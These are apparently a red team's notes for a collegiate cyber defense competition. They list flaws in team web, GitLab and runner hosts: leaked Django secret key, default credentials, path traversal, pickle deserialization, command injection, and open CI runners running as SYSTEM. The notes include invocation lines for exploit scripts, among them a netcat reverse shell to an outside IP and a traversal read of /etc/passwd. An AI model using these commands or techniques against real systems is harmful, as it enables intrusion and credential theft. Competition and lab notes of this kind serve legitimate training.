# Notes on Exploits

These are not a complete list of notes, just some things that I had time to write down and poke at.

## WWW

### Debug Enabled

Debug is enabled. An easy way to test if that is still the case is `http://www.teamX.isucdc.com/accounts/` as that page does not exists and will show the debug page.

### Secret Key

I think there you can deterministically know the session id's that are generated with this key? But not sure what else can be done with it.

```py
# The default secret key every team was given
SECRET_KEY = 'django-insecure-l!8l=nx7+7krz=57yx+a(a6s$nau1m1=4e*ogt(muka42y2crj'
```

### Default Credentials

Default credentials that are stored in the database. These will work even if the ldap is not working.

```
admin:admin - Superuser, "is_staff"
testuser2:password123
testuser3:test
```

There is a weird item in the user database of with the user `testuser` having the "hash" of `!J3yxmWL7W19OqIanrKBARKQ1UaUP6wanJL7NdYIb` which is not a standard django hash and couldn't figure out what it is.

### Run Locally

Running the server locally requires the following python packages

```txt
django
python-ldap
django_auth_ldap
ldap3
```

### Exploits

Wrote up a number of exploits for the www server, and the python code for them. To run them, start a virtual environment and install the required packages.

```sh
python -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
```

#### download-ready file read

There is path traversal for the file read in the download-ready page. Sample of the original code below.

```py
file_name = request.POST.get('file_name')
DOWNLOADS_ROOT = '/opt/ISU2cdc2025/downloads/'
file_path = os.path.join(settings.DOWNLOADS_ROOT, file_name)
```

This does have CSRF cookie, and token protection. The python code for the exploit is `download-ready-file-read.py`, and takes the url as an argument, and optionally the file name (including the `../`s required) to read.

```sh
python www/download-ready-file-read.py http://www.team1.isucdc.com/ ../../../etc/passwd
```

This will save the file that is pulled in the `downloads` directory.

#### Preferences pickle-load

The preferences for the user are stored as pickled objects in the `/opt/ISU2cdc2025/user_data/` directory. When changing this from the profile page, it send the base64 encoded pickled object for the preference choice between light and dark theme to the server, which loads it and sets the theme. This does require a user to be logged in to access the page.

```py
pickled_theme = request.POST.get("theme")
decoded_bytes = base64.b64decode(pickled_theme)
new_theme = pickle.loads(decoded_bytes)
```

The python code for the exploit is `pickle-load.py`, and takes the url as an argument. It defaults to using `testuser3:test` as the credentials, but can take a username and password as arguments using `-u` and `-p` respectively. Optionally it can have `-d` to try all the default credentials. By default it creates a netcat bind shell on port 4444, however the command run can be changed with the `-c` argument. For a command that doesn't close/get backgrounded, there is a `-t` timeout argument that can be used to set the seconds to wait for an error, assuming if the timeout occurs the command was a success.

```sh
python www/pickle-load.py http://www.team1.isucdc.com/ -c 'nc -e /bin/sh 1.2.3.4 1337' -t 2
```

#### request-download command injection

There is a command injection in the email field of the request-download page.

```py
email = request.POST.get('email')
os.system(f"echo {email} >> /Users/jan/ISU2cdc/ISU2cdc2025/mailing-list")
```

Similar manner to the other scripts. With the default credentials of `testuser3:test`, and the command to run as `-c` argument. It starts a bind shell by default.

```sh
python www/request-download.py http://team1.isucdc.com
```

## Git

Running Gitlab 15.5 which has misc known vulns. [Gitlab release list starts about here](https://about.gitlab.com/releases/categories/releases/p5/)

Some notable ones I saw were:
[Something about adding a runner](https://about.gitlab.com/releases/2023/05/05/critical-security-release-gitlab-15-11-2-released/)
[RCE via crafted git patch](https://about.gitlab.com/releases/2023/02/14/critical-security-release-gitlab-15-8-2-released/)
[Another RCE via weird git things](https://about.gitlab.com/releases/2023/01/17/critical-security-release-gitlab-15-7-5-released/)

The repository is public, so you can just clone it and see the changes

```sh
git clone https://git.teamX.isucdc.com/cdc_group/cognitive_data_converter.git
```

```txt
root:password
cdc:password
```

I think the bot account given to [env](#env) that also is listed as a "User administrator" in the gitlab instance.

Signup is open, so you can create an account and login. After logging in, the runner being a shared runner. You can create a new project, and add a `.gitlab-ci.yml` file to it. The runner will run the commands in the file. Also by default all new accounts are automatically made Admin of the gitlab instance?

The default repository has broken creds for CI/CD... but if a team has updated it to something correct, download the file from this link.

```bash
curl http://git.teamX.isucdc.com/cdc_group/cognitive_data_converter/-/raw/main/deploy/deploy.ps1
```

All the teams have the same github runner registration token, so it should be possible to add your own runner to each team, and potentially get jobs given to them and steal info that way.

### Env

This is the gitlab runner box. It is running Windows. It has the Sys-internals suite installed in System32.

This a shared runner, so anyone can add it to the their repo.

The runner is running as `NT AUTHORITY\SYSTEM`, so any commands run in the runner will be run as system.

### IRC

There is a system service "wall.service" that dumps the shadow file to the terminal of each logged in user.
